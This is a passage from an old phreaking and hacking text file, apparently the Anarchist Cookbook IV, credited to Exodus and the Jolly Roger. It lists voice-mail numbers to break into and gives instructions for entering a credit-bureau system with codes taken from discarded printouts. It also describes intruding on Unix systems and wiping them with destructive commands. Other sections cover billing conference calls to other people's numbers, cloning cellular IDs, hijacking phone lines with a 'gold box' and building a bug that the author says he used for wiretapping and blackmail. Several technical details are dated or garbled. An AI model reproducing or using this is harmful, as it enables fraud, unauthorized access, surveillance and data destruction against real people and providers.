800-227-4004 ROLM Collagen Corp.
800-227-8933 ROLM Collagen Corp.
800-268-4500 Voice Mail
800-268-4501 ROLM Texaco
800-268-4505 Voice
Mail
800-268-6364 National Data Credit
800-268-7800 Voice Mail
800-268-7808 Voice Mail
800-328-9632 Voice Mail
800-387-2097 Voice
Mail
800-387-2098 Voice Mail
800-387-8803 ROLM Canadian Tire
800-387-8861 ROLM Canadian Tire
800-387-8862 ROLM Canadian Tire
800-387-8863 ROLM Canadian Tire
800-387-8864 ROLM Canadian Tire
800-387-8870 ROLM Halifax Life
800-387-8871 ROLM Halifax Life
800-387-9115 ASPEN Sunsweep
800-387-9116 ASPEN Sunsweep
800-387-9175
PBX [Hold Music=CHUM FM]
800-387-9218 Voice Messenger
800-387-9644
Carrier
800-426-2638 Carrier
800-524-2133 Aspen
800-663-5000
PBX/Voice Mail [Hold Music=CFMI FM]
800-663-5996 Voice Mail (5 rings)
800-847-6181 Voice Mail
NOTES: Each and every one of these numbers
is available to the 604 (British Columbia) Area Code. Most
are available
Canada Wide and some are located in the United States. Numbers designated ROLM
have been
identified as being connected to a ROLM Phonemail system. Numbers
designated ASPEN are connected to an
ASPEN voice message system. Numbers
designated VOICE MAIL have not been identified as to equipment in
use on
that line. Numbers designated carrier are answered by a modem or data set.
Most Voice Message systems, and ALL Rolms, sound like an answering
machine. Press 0 during the
recording when in a rolm, * or # or other DTMF
in other systems, and be propelled into another
world...
Brought to
you in the Cookbook IV by Exodus!!!!!!!!!!!!!!!!
Index
Hacking TRW by the Jolly Roger
When you call TRW, the dial up will identify itself with the message
"TRW". It will then wait for you
to type the appropiate answer back (such as
CTRL-G) Once This has been done, the system will say
"CIRCUIT BUILDING IN
PROGRESS" Along with a few numbers. After this, it clears the screen (CTRL L)
followed by a CTRL-Q. After the system sends the CTRL-Q, It is ready for the
request. You first type
the 4 character identifyer for the geographical area
of the account..
(For Example)
TCA1 - for certain Calif. &
Vicinity subscribers.
TCA2 - A second CALF. TRW System.
TNJ1 - Their NJ
Database.
TGA1 - Their Georgia Database.
The user then types A
and then on the next line, he must type his 3 char. Option. Most Requests
use the RTS option. OPX, RTX, and a few others exist. (NOTE) TRW will accept
an A, C, or S as the 'X'
in the options above.) Then finally, the user types
his 7 digit subscriber code. He appends his 3-4
character password after it.
It seems that if you manage to get hold of a TRW Printout (Trashing at
Sears, Saks, ETC. or from getting your credit printout from them) Their
subscriber code will be on it
leaving only a 3-4 character p/w up to you.
For Example,
(Call the DialUp)
TRW System Types, ST) CTRL-G
(You type,YT) Circuit building in progress 1234
(ST) CTRL-L CRTL-Q (TCA1
CYT) BTS 3000000AAA
Note: This sytem is in Half Duplex, Even Parity, 7
Bits per word and
2 Stop Bits.
CAUTION:
It is a very stressed
rumor that after typing in the TRW
password Three (3) times.. It sets an
Automatic Number Identification on your
ass, so be careful. And forget who
told you how to do this..
-= Exodus =-
Index
Hacking Vax's & Unix by the Jolly Roger
Unix is a trademark of At&t (and you know what that means)
In this article, we discuss the unix system that runs on the various vax
systems. If you are on
another unix-type system, some commands may differ,
but since it is licenced to bell, they can't make
many changes.
Hacking onto a unix system is very difficult, and in this case, we
advise having an inside source, if
possible. The reason it is difficult to
hack a vax is this: Many vax, after you get a carrier from
them, respond
=> Login:
They give you no chance to see what the login name
format is. Most commonly used are single words,
under 8 digits, usually the
person's name. There is a way around this: Most vax have an acct. called
'suggest' for people to use to make a suggestion to the system root
terminal. This is usually watched
by the system operator, but at late he is
probably at home sleeping or screwing someone's brains out.
So we can write
a program to send at the vax this type of a message:
A screen freeze
(Cntrl-s), screen clear (system dependant), about 255 garbage characters, and
then a
command to create a login acct., after which you clear the screen
again, then unfreeze the terminal.
What this does: When the terminal is
frozen, it keeps a buffer of what is sent. well, the buffer is
about 127
characters long. so you overflow it with trash, and then you send a command line
to create
an acct. (System dependant). after this you clear the buffer and
screen again, then unfreeze the
terminal. This is a bad way to do it, and it
is much nicer if you just send a command to the terminal
to shut the system
down, or whatever you are after... There is always, *Always* an acct. called
root,
the most powerful acct. to be on, since it has all of the system files
on it. If you hack your way
onto this one, then everything is easy from here
on... On the unix system, the abort key is the
Cntrl-d key. watch how many
times you hit this, since it is also a way to log off the system!
A
little about unix architechture: The root directory, called root, is where the
system resides. After
this come a few 'sub' root directories, usually to
group things (stats here, priv stuff here, the user
log here...). Under this
comes the superuser (the operator of the system), and then finally the normal
users. In the unix 'Shell' everything is treated the same. By this we mean:
You can access a program
the same way you access a user directory, and so
on. The way the unix system was written, everything,
users included, are
just programs belonging to the root directory. Those of you who hacked onto the
root, smile, since you can screw everything... the main level (exec level)
prompt on the unix system
is the $, and if you are on the root, you have a #
(superuser prompt).
Ok, a few basics for the system... To see where you
are, and what paths are active in regards to your
user account, then type
=> pwd
This shows your acct. seperated by a slash with another
pathname (acct.), possibly many times. To
connect through to another path,
or many paths, you would type:
You=> path1/path2/path3
and then
you are connected all the way from path1 to path3. You can run the programs on
all the paths
you are connected to. If it does not allow you to connect to a
path, then you have insufficient privs,
or the path is closed and archived
onto tape. You can run programs this way also:
you=>
path1/path2/path3/program-name
Unix treats everything as a program, and
thus there a few commands to learn... To see what you have
access to in the
end path, type
=> ls
for list. this show the programs you can
run. You can connect to the root directory and run it's
programs with
=> /root
By the way, most unix systems have their log file on the
root, so you can set up a watch on the file,
waiting for people to log in
and snatch their password as it passes thru the file. To connect to a
directory, use the command:
=> cd pathname
This allows you to
do what you want with that directory. You may be asked for a password, but this
is
a good ay of finding other user names to hack onto. The wildcard
character in unix, if you want to
search down a path for a game or such, is
the *.
=> ls /*
Should show you what you can access. The file
types are the same as they are on a dec, so refer to
that section when
examining file. To see what is in a file, use the
=> pr
filename
command, for print file. We advise playing with pathnames to get the hang of the
concept.
There is on-line help available on most systems with a 'help' or a
'?'. We advise you look thru the
help files and pay attention to anything
they give you on pathnames, or the commands for the system.
You can, as a
user, create or destroy directories on the tree beneath you. This means that
root can
kill everything but root, and you can kill any that are below you.
These are the
=> mkdir pathname
=> rmdir pathname
commands. Once again, you are not alone on the system... type
=>
who
to see what other users are logged in to the system at the time. If
you want to talk to them=> write
username Will allow you to chat at the
same time, without having to worry about the parser. To send
mail to a user,
say
=> mail
And enter the mail sub-system. To send a message to
all the users on the system, say
=> wall
Which stands for 'write
all'. By the way, on a few systems, all you have to do is hit the key
to end the message, but on others you must hit the cntrl-d key. To send a
single message to a user,
say
=> write username
this is very
handy again! If you send the sequence of characters discussed at the very
beginning of
this article, you can have the super-user terminal do tricks
for you again.
Privs:
If you want superuser privs, you can
either log in as root, or edit your acct. so it can say
=> su
this now gives you the # prompt, and allows you to completely by-pass
the protection. The wonderful
security conscious developers at bell made it
very difficult to do much without privs, but once you
have them, there is
absolutely nothing stopping you from doing anything you want to. To bring down a
unix system:
=> chdir /bin
=> rm *
this wipes out the
pathname bin, where all the system maintenance files are. Or try:
=> r -r
This recursively removes everything from the system except the remove
command itself. Or try:
=> kill -1,1
=> sync
This wipes
out the system devices from operation. When you are finally sick and tired from
hacking on
the vax systems, just hit your cntrl-d and repeat key, and you
will eventually be logged out.
The reason this file seems to be very
sketchy is the fact that bell has 7 licenced versions of unix
out in the
public domain, and these commands are those common to all of them. I recommend
you hack
onto the root or bin directory, since they have the highest levels
of privs, and there is really not
much you can do (except develop software)
without them.
Index
Verification Circuits courtesy of the Jolly Roger
(originally an Apple ][ file so forgive the upper case!)
1. ONE
BUSY VERIFICATION CONFERENCE CIRCUIT IS ALWAYS PROVIDED.THE CIRCUIT IS A
THREE-WAY CONFERENCE
BRIDGE THAT ENABLES AN OPERERATOR TO VERIFY THE
BUSY/IDLE CONDITION OF A SUBSCRIBER LINE.UPON REQUEST
OF A PARTY ATTEMPTING
TO REACH A SPECIFIED DIRECTORY NUMBER, THE OPERATOR DIALS THE CALLED LINE NUMBER
TO DETERMINE IF THE LINE IS IN USE,IF THE RECEIVER IS OFF THE HOOK,OR IF THE
LINE IS IN LOCKOUT DUE TO
A FAULT CONDITKON.THE OPERATOR THEN RETURNS TO THE
PARTY TRYING TO REACH THE DIRE CTORY NUMBER AND
STATES THE CONDITION OF THE
LINE.LINES WITH DATA SECURITY CAN NOT BE ACCESSED FOR BUSY VERIFICATION
WHEN
THE LINE IS IN USE.(REFER ALSO TO DATA SECURITY)
2. THREE PORTS ARE
ASSIGNED TO EACH BUSY VERIFICATION CONFERENCE CIRCUIT.ONE PORT IS FOR OPERATOR
ACCESS AND TWO PORTS ARE USED TO SPLIT AN EXISTING CONNECTION.TO VERKFY THE
BUSY/IDLE CONDITION OF A
LINE,THE OPERATOR ESTABLISHED A CONNECTION TO THE
OPERATOR ACCESS PORT AND DIALS THE DIRECTORY NUMBER
OF THE LINE TO BE
VERIFIED.IF THE LINE IS IN USE,THE EXISTING CONNECTION IS BROKEN AND IMMEDIATLY
RE-ESTABLISHED THROUGH THE OTHER TWO PORTS OF THE BUSY VERIFICATION CIRCUIT
WITHOUT INTERRUPTION. BUSY
VERIFICATION CIRCUIT IS CONTROLLED BY ACCESS
CODE. A DEDICATED TRUNK CAN BE USED BUT IS NOT NECESSARY.
3. THE BUSY
VREIFICATION CIRCUIT ALSO CAN BE USED FOR TEST VERIFY FROM THE WIRE CHIEFS TEST
PANEL.
B. ADDITIONAL BUSY VERIFICATION CONFERENCE CIRCUITS (002749) O.K.
THERE IT IS-RIGHT OUT OF AN ESS
MANUAL WORD FOR WORD! (AND IM GETTING 25
LINEAR FEET OF ESS MANUALS!!! NOT COUNTING THE STACK RECEIVED
SO FAR!
Brought to you in the Cookbook IV by Exodus!!!!
Index
White Box Plans by the Jolly Roger
Introduction:
The White Box is simply a portable Touch-Tone
keypad. For more information on Touch-Tone, see my
Silver Box Plans.
Materials:
* 1 Touch-Tone Keypad
* 1 Miniature 1000 to 8 Ohm
Transformer (Radio Shack # 273-1380)
* 1 Standard 8 Ohm Speaker
* 2 9V
Batteries
* 2 9V Battery Clips
Procedure:
1. Connect the Red
Wire from the Transformer to either terminal on the Speaker.
2. Connect the
White Wire from the Transformer to the other terminal on the Speaker.
3.
Connect the Red Wire from one Battery Clip to the Black Wire from the other
Battery Clip.
4. Connect the Red Wire from the second Battery Clip to the
Green Wire from the Keypad.
5. Connect the Blue Wire from the Keypad to the
Orange/Black Wire from the Keypad.
6. Connect the Black Wire from the first
Battery Clip to the two above wires (Blue and Black/Orange).
7. Connect the
Black Wire from the Keypad to the Blue Wire from the Transformer.
8. Connect
the Red/Green Wire from the Keypad to the Green Wire from the Transformer.
9. Make sure the Black Wire from the Transformer and the remaining wires
from the Keypad are free.
10. Hook up the Batteries.
Optional:
*
Put it all in a case.
* Add a Silver Box to it.
Use:
Just
use it like a normal keypad, except put the speaker next to the receiver of the
phone you're
using.
---------Exodus--------
Index
The BLAST Box Courtesy of the Jolly Roger
Ever want to really make yourself be heard? Ever talk to someone on the
phone who just doesn't shut
up? Or just call the operator and pop her
eardrum? Well, up until recently it has been impossible for
you to do these
things. That is, unless of course you've got a blast box. All a blast box is, is
a
really cheap amplifier, (around 5 watts or so) connected in place of the
microphone on your telephone.
It works best on model 500 AT&T Phones,
and if constructed small enough, can be placed inside the
phone.
Construction:
Construction is not really important. Well it is,
but since I'm letting you make your own amp, I
really don't have to include
this.
Usage:
Once you've built your blast box, simply connect a
microphone (or use the microphone from the phone)
to the input of the
amplifier, and presto. There it is. Now, believe it or not, this device actually
works. (At least on crossbar.) It seems that Illinois bell switching systems
allow quite alot of
current to pass right through the switching office, and
out to whoever you're calling. When you talk
in the phone, it comes out of
the other phone (again it works best if the phone that you're calling
has
the standard western electric earpiece) incredibly loud. This device is
especially good for PBS
Subscription drives. Have "Phun", and don't get
caught!
---- Compiled by: Exodus------
Index
Dealing with the Rate & Route Operator
It seems that fewer and fewer people have blue boxes these days, and
that is really too bad. Blue
boxes, while not all that great for making free
calls (since the TPC can tell when the call was made,
as well as where it
was too and from), are really a lot of fun to play with. Short of becoming a
real
live TSPS operator, they are about the only way you can really play
with the network.
For the few of you with blue boxes, here are some
phrases which may make life easier when dealing with
the rate & route
(R&R) operators. To get the R&R op, you send a KP + 141 + ST. In some
areas you may
need to put another NPA before the 141 (i.e., KP + 213 + 141 +
ST), if you have no local R&R ops.
The R&R operator has a myriad
of information, and all it takes to get this data is mumbling cryptic
phrases. There are basically four special phrases to give the R&R ops.
They are NUMBERS route,
DIRECTORY route, OPERATOR route, and PLACE NAME.
To get an R&R an area code for a city, one can call the R&R
operator and ask for the numbers route.
For example, to find the area code
for Carson City, Nevada, we'd ask the R&R op for "Carson City,
Nevada,
numbers route, please." and get the answer, "Right... 702 plus." meaning that
702 plus 7
digits gets us there.
Sometimes directory assistance
isn't just NPA + 131. The way to get these routings is to call R&R and
ask for "Anaheim, California, directory route, please." Of course, she'd
tell us it was 714 plus,
which means 714 + 131 gets us the D.A. op there.
This is sort of pointless example, but I couldn't
come up with a better one
on short notice.
Let's say you wanted to find out how to get to the
inward operator for Sacremento, California. The
first six digits of a number
in that city will be required (the NPA and an NXX). For example, let us
use
916 756. We would call R&R, and when the operator answered, say, "916 756,
operator route,
please." The operator would say, "916 plus 001 plus." This
means that 916 + 001 + 121 will get you the
inward operator for Sacramento.
Do you know the city which corresponds to 503 640? The R&R operator
does, and will tell you that it is Hillsboro, Oregon, if you sweetly ask for
"Place name, 503 640,
please."
For example, let's say you need the
directory route for Sveg, Sweden. Simply call R&R, and ask for,
"International, Baden, Switzerland. TSPS directory route, please." In
response to this, you'd get,
"Right... Directory to Sveg, Sweden. Country
code 46 plus 1170." So you'd route yourself to an
international sender, and
send 46 + 1170 to get the D.A. operator in Sweden.
Inward operator
routings to various countries are obtained the same way "International, London,
England, TSPS inward route, please." and get "Country code 44 plus 121."
Therefore, 44 plus 121 gets
you inward for London.
Inwards can get
you language assitance if you don't speak the language. Tell the foreign inward,
"United Staes calling. Language assitance in completing a call to (called
party) at (called number)."
R&R operators are people are people too,
y'know. So always be polite, make sure use of 'em, and dial
with care.
-----------Exodus
Index
Cellular Phreaking courtesy of The Jolly Roger
The cellular/mobile phone system is one that is perfectly set up to be
exploited by phreaks with the
proper knowledge and equipment. Thanks to
deregulation, the regional BOC's (Bell Operating Companies)
are scattered
and do not communicate much with each other. Phreaks can take advantage of this
by
pretending to be mobile phone customers whose "home base" is a city
served by a different BOC, known
as a "roamer". Since it is impractical for
each BOC to keep track of the customers of all the other
BOC's, they will
usually allow the customer to make the calls he wishes, often with a surcharge
of
some sort.
The bill is then forwarded to the roamer's home BOC
for collection. However, it is fairly simple (with
the correct tools) to
create a bogus ID number for your mobile phone, and pretend to be a roamer from
some other city and state, that's "just visiting". When your BOC tries to
collect for the calls from
your alleged "home BOC", they will discover you
are not a real customer; but by then, you can create
an entirely new
electronic identity, and use that instead.
How does the cellular system
know who is calling, and where they are? When a mobile phone enters a
cell's
area of transmission, it transmits its phone number and its 8 digit ID number to
that cell, who
will keep track of it until it gets far enough away that the
sound quality is sufficiently diminished,
and then the phone is "handed off"
to the cell that the customer has walked or driven into. This
process
continues as long as the phone has power and is turned on. If the phone is
turned off (or the
car is), someone attempting to call the mobile phone will
receive a recording along the lines of "The
mobile phone customer you have
dialed has left the vehicle or driven out of the service area." When a
call
is made to a mobile phone, the switching equipment will check to see if the
mobile phone being
called is "logged in", so to speak, or present in one of
the cells. If it is, the call will then act
(to the speaking parties) just
like a normal call - the caller may hear a busy tone, the phone may
just
ring, or the call may be answered.
How does the switching equipment know
whether or not a particular phone is authorized to use the
network? Many
times, it doesn't. When a dealer installs a mobile phone, he gives the phone's
ID number
(an 8 digit hexadecimal number) to the local BOC, as well as the
phone number the BOC assigned to the
customer. Thereafter, whenever a phone
is present in one of the cells, the two numbers are checked -
they should be
registered to the same person. If they don't match, the telco knows that an
attempted
fraud is taking place (or at best, some transmission error) and
will not allow calls to be placed or
received at that phone. However, it is
impractical (especially given the present state of
deregulation) for the
telco to have records of every cellular customer of every BOC. Therefore, if
you're going to create a fake ID/phone number combination, it will need to
be "based" in an area that
has a cellular system (obviously), has a
different BOC than your local area does, and has some sort of
a "roamer"
agreement with your local BOC.
How can one "phreak" a cellular phone?
There are three general areas when phreaking cellular phones;
using one you
found in an unlocked car (or an unattended walk-about model), modifying your own
chip
set to look like a different phone, or recording the phone number/ID
number combinations sent by other
local cellular phones, and using those as
your own. Most cellular phones include a crude "password"
system to keep
unauthorized users from using the phone - however, dealers often set the
password
(usually a 3 to 5 digit code) to the last four digits of the
customer's mobile phone number. If you
can find that somewhere on the phone,
you're in luck. If not, it shouldn't be TOO hard to hack, since
most people
aren't smart enough to use something besides "1111", "1234", or whatever. If you
want to
modify the chip set in a cellular phone you bought (or stole), there
are two chips (of course, this
depends on the model and manufacturer, yours
may be different) that will need to be changed - one
installed at the
manufacturer (often epoxied in) with the phone's ID number, and one installed by
the
dealer with the phone number, and possible the security code. To do
this, you'll obviously need an
EPROM burner as well as the same sort of
chips used in the phone (or a friendly and unscrupulous
dealer!). As to
recording the numbers of other mobile phone customers and using them; as far as
I
know, this is just theory... but it seems quite possible, if you've got
the equipment to record and
decode it. The cellular system would probably
freak out if two phones (with valid ID/phone number
combinations) were both
present in the network at once, but it remains to be seen what will happen.
-----Compiled by: Exodus-------
Index
Cheesebox Plans Courtesy of The Jolly Roger
A Cheesebox (named for the type of box the first one was found in) is a
type of box which will, in
effect, make your telephone a Pay-Phone.....This
is a simple,modernized, and easy way of doing it....
Inside Info:These
were first used by bookies many years ago as a way of making calls to people
without
being called by the cops or having their numbers traced and/or
tapped......
How To Make A Modern Cheese Box
Ingredients:
* 1 Call Forwarding service on the line
* 1 Set of Red Box Tones
* The number to your prefix's Intercept operator (do some scanning for this
one)
How To:
After you find the number to the intercept operator
in your prefix, use your call-forwarding and
forward all calls to her...this
will make your phone stay off the hook(actually, now it waits for a
quarter
to be dropped in)...you now have a cheese box... In Order To Call Out On This
Line:You must
use your Red Box tones and generate the quarter dropping
in...then,you can make phone calls to
people...as far as I know, this is
fairly safe, and they do not check much...Although I am not sure, I
think
you can even make credit-card calls from a cheesebox phone and not get traced...
-- Exodus --
Index
HOW TO START YOUR OWN CONFERENCES! Brought to you by Exodus
BLACK BART SHOWED HOW TO START A CONFERENCE CALL THRU AN 800 EXCHANGE,
AND I WILL NOW EXPLAIN HOW TO
START A CONFERENCE CALL IN A MORE ORTHODOX
FASHIO, THE 2600 HZ. TONE.
FIRSTLY, THE FONE COMPANY HAS WHAT IS CALLED
SWITCHING SYSTEMS. THERE ARE SE VERAL TYPES, BUT THE ONE
WE WILL CONCERN
OURSELVES WITH, IS ESS (ELECTRONIC SWITCHING SYSTEM). IF YOUR AREA IS ZONED FOR
ESS,
DO NOT START A CONFERENCE CALL VIA THE 2600 HZ. TONE, OR BELL SECURITY
WILL NAIL YOUR ASS! TO FND OUT
IF YOU ARE UNDER ESS, CALL YOUR LOCAL
BUSINESS OFFICE, AND ASK THEM IF YOU CAN GET CALL
WAITING/FORWARDING, AND IF
YOU CAN, THAT MEANS THAT YOU ARE IN ESS COUNTRY , AND CONFERENCE CALLING IS
VERY, VERY DANGEROUS!!! NOW, IF YOU ARE NOT IN ESS, YOU WILL NEED THE
FOLLOWING EQUIPMENT:
* AN APPLE CAT II MODEM
* A COPY OF TSPS 2 OR CAT'S
MEOW
* A TOUCH TONE FONE LINE
* AND A TOUCH TONE FONE. (TRUE TONE)
NOW, WITH TSPS 2, DO THE FOLLOWING:
* RUN TSPS 2
* CHOSE OPTION
1
* CHOSE OPTION 6
* CHOSE SUB-OPTION 9
NOW TYPE:
1-514-555-1212 (DASHES ARE NOT NEEDED)
LISTEN WITH YOUR HANDSET, AND AS
SOON AS YOU HEAR A LOUD 'CLICK', THEN TYPE
$ TO GENERATE THE 2600 HZ. TONE.
THIS OBNOXIOUS TONE WILL CONTINUE FOR A FEW SECONDS, THEN LISTEN
AGAIN AND
YOU SHOULD HEAR ANOTHER LOUD 'CLICK'.
NOW TYPE:
KM2130801050S
WHERE 'K' = KP TONE
'M' = MULTI FREQUENCY MODE
'S' = S TONE
NOW LISTEN TO THE HANDSET AGAIN, AND WAIT UNTIL YOU HEAR THE 'CLICK'
AGAIN. THEN TYPE:
KM2139752975S
WHERE 2139751975 IS THE NUMBER TO BILL
THE CONFERENCE CALL TO. NOTE: 213-975- 1975 IS A DISCONNECTED
NUMBER, AND I
STRONGLY ADVISE THAT YOU ONLY BILL THE CALL TO THIS NUMBER, OR THE FONE COMPANY
WILL
FIND OUT, AND THEN.......... REMEBER, CONFERENCE CALLS ARE ITEMIZED, SO
IF YOU DO BILL IT TO AN
ENEMY'S NUMB ER, HE CAN EASILY FIND OUT WHO DID IT
AND HE CAN BUST YOU!
YOU SHOULD NOW HEAR 3 BEEPS, AND A SHORT
PRE-RECORDED MESSAGE. FROM HERE ON, EVERYTHING IS ALL MENU
DRIVEN.
CONFERENCE CALL COMMANDS
FROM THE '#' MODE:
1 = CALL A
NUMBER
6 = TRANSFER CONTROL
7 = HANGS UP THE CONFERENCE CALL
9 =
WILL CALL A CONFERENCE OPERATR
STAY AWAY FROM 7 AND 9! IF FOR SOME
REASON AN OPERATOR GETS ON-LINE, HANG UP! IF YOU GET A BUSY SIGNAL
AFTER
KM2130801050S, THAT MEANS THAT THE TELECONFEREN CING LINE IS TEMPORARILY DOWN.
TRY LATER,
PREFERRABLY FROM 9AM TO 5PM WEEK DAYS, SINCE CONFERENCE CALLS ARE
PRIMARILY DESIGNED FOR BUSINESS
PEOPLE.
THE LEECH
Index
Gold Box Plans by The Jolly Roger
HOW TO BUILD IT
You will need the following:
* Two 10K OHM
and three 1.4K OHM resistors
* Two 2N3904 transistors
* Two Photo Cells
* Two Red LED'S (The more light produced the better)
* A box that will
not let light in
* Red and Green Wire
Light from the #1 LED must
shine directly on the photocell #1. The gold box I made needed the top of
the LED's to touch the photo cell for it to work. The same applies to the #2
photo cell and LED.
1
:-PHOTOCELL--:
: :
: :BASE
: 1 TTTTT
: +LED- TRANSISTOR
: TTTTT
: : :
: -I(-- : :COLLECTOR
RED1--< >:--: :-------:-----GREEN2
-I(-- : ----------:
: :
2 :-/+/+/-/+/+/-/+/+/-/+/+/
LED 10K 10K 1.4K 1.4K
RESISTORES
2
-PHOTOCELL-----------------
: :
:BASE :
TTTTT :
TRANSISTOR :
TTTTT :
: :EMITTER :
GREEN1-
--------------------------RED2
: :
/+/+/
1.4K
The 1.4K
resistor is variable and if the second part of the gold box is skipped it will
still work but
when someone picks up the phone they will hear a faint dial
tone in the background and might report it
to the Gestapo er...(AT&T).
1.4K will give you good reception with little risk of a Gestapo agent at
your door.
Now that you have built it take two green wires of the
same length and strip the ends, twist two ends
together and connect them to
green1 and place a piece of tape on it with "line #1" writing on it.
Continue the process with red1 only use red wire. Repeat with red2 and
green2 but change to line #2.
HOW TO INSTALL
You will need to
find two phone lines that are close together. Label one of teh phone lines "Line
#1".
Cut the phone lines and take the outer coating off it. Tere should be 4
wires. Cut the yellow and
black wires off and strip the red and green wires
for both lines.
Line #1 should be in two pieces. Take the green wire of
one end and connect it to one of the green
wires on the gold box. Take the
other half of line #1 and hook the free green wire to the green wire
on the
phone line. Repeat the process with red1 and the other line.
All you
need to do now is to write down the phone numbers of the place you hooked it up
at and go home
and call it. You should get a dial tone!!! If not, try
changing the emittor with the collector.
Have a great time with this!
--------Exodus----------
Index
The History of ESS Courtesy of the Jolly Roger
Of all the new 1960s wonders of telephone technology - satellites, ultra
modern Traffic Service
Positions (TSPS) for operators, the picturephone, and
so on - the one that gave Bell Labs the most
trouble, and unexpectedly
became the greatest development effort in Bell System's history, was the
perfection of an electronic switching system, or ESS.
It may be
recalled that such a system was the specific end in view when the project that
had
culminated in the invention of the transistor had been launched back in
the 1930s. After successful
accomplishment of that planned miracle in
1947-48, further delays were brought about by financial
stringency and the
need for further development of the transistor itself. In the early 1950s, a
Labs
team began serious work on electronic switching. As early as 1955,
Western Electric became involved
when five engineers from the Hawthorne
works were assigned to collaborate with the Labs on the
project. The
president of AT&T in 1956, wrote confidently, "At Bell Labs, development of
the new
electronic switching system is going full speed ahead. We are sure
this will lead to many improvements
in service and also to greater
efficiency. The first service trial will start in Morris, Ill., in
1959."
Shortly thereafter, Kappel said that the cost of the whole project would
probably be $45
million.
But it gradually became apparent that the
developement of a commercially usable electronic switching
system - in
effect, a computerized telephone exchange - presented vastly greater technical
problems
than had been anticipated, and that, accordingly, Bell Labs had
vastly underestimated both the time
and the investment needed to do the job.
The year 1959 passed without the promised first trial at
Morris, Illinois;
it was finally made in November 1960, and quickly showed how much more work
remained
to be done. As time dragged on and costs mounted, there was a
concern at AT&T and something
approaching panic at Bell Labs. But the
project had to go forward; by this time the investment was too
great to be
sacrificed, and in any case, forward projections of increased demand for
telephone service
indicated that within a phew years a time would come when,
without the quantum leap in speed and
flexibility that electronic switching
would provide, the national network would be unable to meet the
demand. In
November 1963, an all-electronic switching system went into use at the Brown
Engineering
Company at Cocoa Beach, Florida. But this was a small
installation, essentially another test
installation, serving only a single
company. Kappel's tone on the subject in the 1964 annual report
was, for
him, an almost apologetic: "Electronic switching equipment must be manufactured
in volume to
unprecedented standards of reliability.... To turn out the
equipment economically and with good speed,
mass production methods must be
developed; but, at the same time, there can be no loss of
precision..."
Another year and millions of dollars later, on May 30, 1965, the first
commercial
electric centeral office was put into service at Succasunna, New
Jersey.
Even at Succasunna, only 200 of the town's 4,300 subscribers
initially had the benefit of electronic
switching's added speed and
additional services, such as provision for three party conversations and
automatic transfer of incoming calls. But after that, ESS was on its way. In
January 1966, the second
commercial installation, this one serving 2,900
telephones, went into service in Chase, Maryland. By
the end of 1967 there
were additional ESS offices in California, Connecticut, Minnesota, Georgia, New
York, Florida, and Pennsylvania; by the end of 1970 there were 120 offices
serving 1.8 million
customers; and by 1974 there were 475 offices serving
5.6 million customers.
The difference between conventional switching and
electronic switching is the difference between
"hardware" and "software"; in
the former case, maintenence is done on the spot, with screwdriver and
pliers, while in the case of electronic switching, it can be done remotely,
by computer, from a
centeral point, making it possible to have only one or
two technicians on duty at a time at each
switching center. The development
program, when the final figures were added up, was found to have
required a
staggering four thousand man-years of work at Bell Labs and to have cost not $45
million
but $500 million!
Index
The Lunch Box Courtesy of Exodus
Introduction
The Lunch Box is a VERY simple transmitter which
can be handy for all sorts of things. It is quite
small and can easily be
put in a number of places. I have successfully used it for tapping fones,
getting inside info, blackmail and other such things. The possibilities are
endless. I will also
include the plans or an equally small receiver for your
newly made toy. Use it for just about
anything. You can also make the
transmitter and receiver together in one box and use it as a walkie
talkie.
Materials you will need
* (1) 9 volt battery with battery clip
* (1) 25-mfd, 15 volt electrolytic capacitor
* (2) .0047 mfd capacitors
* (1) .022 mfd capacitor
* (1) 51 pf capacitor
* (1) 365 pf variable
capacitor
* (1) Transistor antenna coil
* (1) 2N366 transistor
* (1)
2N464 transistor
* (1) 100k resistor
* (1) 5.6k resistor
* (1) 10k
resistor
* (1) 2meg potentiometer with SPST switch
* Some good wire,
solder, soldering iron, board to put it on, box (optional)
Schematic for
The Lunch Box
This may get a tad confusing but just print it out and pay
attention.
[!]
!
51 pf
!
---+---- ------------base collector
! )( 2N366 +----+------/\/\/----GND
365 pf () emitter !
! )( ! !
+-------- ---+---- ! !
! ! ! ! !
GND / .022mfd ! !
10k\ ! ! !
/ GND +------------------------emitter
! ! ! 2N464
/ .0047 ! base
collector
2meg \----+ ! ! +--------+ !
/ ! GND ! ! !
GND ! ! !
+-------------+.0047+--------------------+ ! !
! +--25mfd-----+
-----------------------------------------+ ! !
microphone +--/\/\/-----+
---------------------------------------------+ 100k !
!
GND---->/<---------------------!+!+!+---------------+
switch
Battery
from 2meg pot.
Notes about the schematic
* GND means
ground
* The GND near the switch and the GND by the 2meg potentiometer
should be connected.
* Where you see:
)(
()
)(
it is the
transistor antenna coil with 15 turns of regular hook-up wire around it.
*
The middle of the loop on the left side (the left of "()") you should run a wire
down to the "+"
which has nothing attached to it. There is a .0047 capacitor
on the correct piece of wire.
* For the microphone use a magnetic earphone
(1k to 2k).
* Where you see "[!]" is the antenna. Use about 8 feet of wire
to broadcast approx 300ft. Part 15 of
the FCC rules and regulation says you
can't broadcast over 300 feet without a license. (Hahaha).
Use more wire for
an antenna for longer distances. (Attach it to the black wire on the fone line
for about a 250 foot antenna!)
Operation of the Lunch Box
This transmitter will send the signals over the AM radio band. You use
the variable capacitor to
adjust what freq. you want to use. Find a good
unused freq. down at the lower end of the scale and
you're set. Use the 2
meg pot. to adjust gain. Just fuck with it until you get what sounds good. The
switch on the 2meg is for turning the Lunch Box on and off. When everything
is adjusted, turn on an AM
radio adjust it to where you think the signal is.
Have a friend lay some shit thru the Box and tune in
to it. That's all there
is to it. The plans for a simple receiver are shown below:
The Lunch Box
receiver
* (1) 9 volt battery with battery clip
* (1) 365 pf
variable capacitor
* (1) 51 pf capacitor
* (1) 1N38B diode
* (1)
Transistor antenna coil
* (1) 2N366 transistor
* (1) SPST toggle switch
* (1) 1k to 2k magnetic earphone
Schematic for receiver
[!]
!
51 pf
!
+----+----+
! !
) 365 pf
(----+ !
) !
!
+---------+---GND
!
+---*>!----base collector-----
diode
2N366 earphone
emitter +-----
! !
GND !
-
+
- battery
+
GND------>/<------------+
switch
Closing statement
This two devices can be built for under a total of $10.00. Not too bad.
Using these devices in illegal
ways is your option. If you get caught, I
accept NO responsibility for your actions. This can be a lot
of fun if used
correctly. Hook it up to the red wire on the phone line and it will send the
conversation over the air waves.
Enjoy!
Index
Olive Box Plans Courtesy of Exodus
This is a relatively new box, and all it basically does is serve as a
phone ringer. You have two
choices for ringers, a piezoelectric transducer
(ringer), or a standard 8 ohm speaker. The speaker has
a more pleasant tone
to it, but either will do fine. This circuit can also be used in conjunction
with
a rust box to control an external something or other when the phone
